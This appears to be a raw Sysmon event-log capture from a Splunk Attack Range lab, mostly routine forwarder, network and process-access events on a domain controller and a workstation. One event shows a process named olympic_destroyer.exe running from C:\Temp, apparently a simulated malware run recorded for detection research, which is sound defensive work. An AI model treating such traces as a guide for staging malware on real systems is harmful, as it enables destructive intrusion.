10:58:04.240{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:04.240{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-133C-6216-6306-000000003802}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000293412Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:04.241{C8EA50B7-133C-6216-6306-000000003802}4252C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217954Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:05.645{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2AF39EEA0171AE5FBA98A9BC62D8856,SHA256=EA7D001CA2C2A9C1E35D722790955B0E7F5F33F2417D24AF3DD45B765D504C1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:05.571{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=81642776E2907AE5756389247B9B8647,SHA256=2D17BD2C4AA246B7F95594D75F7B7028E8E970AF5EE8733E359FFD2BA9C18055,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:03.259{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53798-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000293422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:03.259{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53798-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000217955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:06.739{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76E8729BBAEF018B2D16F00342079D48,SHA256=8EA6A03158E81A4C4983FA206C86FA848722C4144743B7C6B46955A632B626C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:06.587{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=458A809ED82B06811AED59C4A2387179,SHA256=62FC056D29646CF7E7158DC6E40145432BE164390A3D7BA5868337D172FBE67F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:07.958{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9000E500F553B1A32F58525082C70138,SHA256=643AE33CC2A401BC962C64DC95389002B7DAB58EBD844BD35FAFDA817538E735,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:07.588{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25DC1ED95B83404166E02AB221F7EBAF,SHA256=08B51E3D32AD88F217312C0FDE9CD9A5445700CA7502F38D6056E3BB0C1D3A6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:08.977{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F779EFD42C659E273DE1A7B5E878B94A,SHA256=7A50AC8306D964EEDBD880596D592D64219F8625E86DED661FA8DC1C223A393C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:08.977{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\respondent-20220223083233-141MD5=7840F8D654EED3E7C6FA395A9E23FA56,SHA256=FC4C38DACEF1698268BE802A03907A00216EAC67FA531AF20528DD4173FB9624,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:08.589{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB3A11667A76EA9CAB40046ED64EC675,SHA256=AD099B8A1B079E30C66B655505E6EC3A1EF7C0C9D708DEA540EACA3D3BA5CD07,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:06.547{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51427-false10.0.1.12-8000- 354300x8000000000000000293427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:06.530{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53799-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:09.614{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4D2C3573066FE16A88CBBD4FFA047F1,SHA256=3DD73E8190356852E7B4CD7DA1A15BCFF575852CE7DEEAAF8CDA0960B53C9385,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:09.975{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-142MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:10.629{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDC762EC9E682E1B91D1ED9EB9971C1C,SHA256=6FBDB88B94FBE4B17ECBB53F1228C82E7C2D9BE67B641A49185A7F8EC51D734B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:10.035{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=808A50802D462000AA30B2BB49ED9FEC,SHA256=82718E4F9FF291B8996472E9DD18D045C794234CCA943AEA3DB1FB6B6DF7D34C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:11.644{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6683E45683F4F13CF8B8B04422EDDFEB,SHA256=991CEAD374822041E946D53D6EECC8724302D4ABCFAB3EBAD001AC4226C9A3D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:11.069{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=153EC8DF0F8A8A75048D2918C8314FBB,SHA256=64580521700F348A1D0FF6A2028669DC5A0CE43AA304CB8679002D11ACC88992,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293432Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:12.663{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F984D826F8B80A8826D54CEB9CB6F100,SHA256=0249DE435AF4B88961BB6C27E75C9CC247F7FFAB731B18525F46902693A9848A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:12.100{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2947047375BC2D5B0E0D1A52D091E34A,SHA256=D39785E193230B9CC5AA863B5303B46FE34E86BDD6385586CD67BD0AA2EF04D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293433Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:13.680{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=07B5E7887CCCDED5FDD4E2E7BF2A1BF6,SHA256=B966F19E65929D4062A5D4BA3E6B4DC791154026C089F73170092A21E76E0866,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000217965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:11.595{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51428-false10.0.1.12-8000- 23542300x8000000000000000217964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:13.209{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0ECDFFDC606C9D7F25FE9BBC88F813E9,SHA256=436A85B49488F92AE9F9CB01B690F42574C84D6CC69ABD089FCAC58E279324F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293435Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:14.711{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC965EFFB024A6E47FF050BBF2A4D6F9,SHA256=754E5F1D2C763B567681C34A306D7A4B8BAA3DAAF0BD6ADBB45B0E1DE92B56DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:14.225{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=84C2490989887DFC6671D7CEDD68C6BE,SHA256=BE3936F09882305226139133CC3F549FF21A767AB7454AAAD39F727B593B1A89,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000293434Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:11.717{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53800-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000293436Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:15.761{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1F2D01C4B102BFF5CB20D83FBFB0391,SHA256=0321C50FF4B20BED2920CA3D93EA3DF9F7158572B18EB11B378C19C4D1D5BCC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:15.240{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD9C78D964AC1065442FB51BAA36C337,SHA256=5B9CD5F51CD16C1312161E9A1831C3DDD24F9C6C1B08C0758A5F01B19B8AF4E5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:16.980{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000293437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:16.827{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06F504C7000737C3DFB5C2DAB882D1AF,SHA256=3E8F310CCD0B21A4DB6B047E5E334734CD57916F90A27C79D8B06019A9E5100C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:16.256{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4AE75DEF76BB6DB712EC64B74A838BD9,SHA256=181C95CCB84AA27F7F3372BFE2F82E472D15F866E4E2F82912521076EAA7C71F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:17.831{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3B1AD46B2DC877C910D286587296FAF,SHA256=3FF14D2F8BAAB80922EE00995922BDF369D96204F714820EC4B5C9C087034B4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:17.271{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB8717E8ADD44D40E0A56F85761A0B38,SHA256=9048DF68666BFD2B8C684C2C667093135460637DDD27E561A08FD43131C85D01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293442Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:18.841{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEBB65272103048DE5AEF2726A4A1CEC,SHA256=6F63B7CEEB55ED331C0B374BC8515066907521A6E4F79CBBB35EFB2B5464100D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:18.506{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2FBC477CE79714DCDE8CC0C20310C81,SHA256=B264A95E4111B8FB9217748C11A5BC4F23E46BB59D9529244A7F9D132F8D7B8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293441Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:18.010{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=D4E950A98E4E7A6B6FDA6F0A9D1D8754,SHA256=7ABBB4FA6F34E1A84C21218A6C870E5E3BFB1E6C97CE639D806E0D19AD62753E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:18.010{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=9A51A570EEED296854841B7D2A4A74C4,SHA256=FB47D9DFCCAADE671A5BD1B65DD7F08C93AA71D95280C525C1104DEDEFF53731,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293461Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.962{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-134B-6216-6506-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293460Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.962{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293459Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:19.962{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293458Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 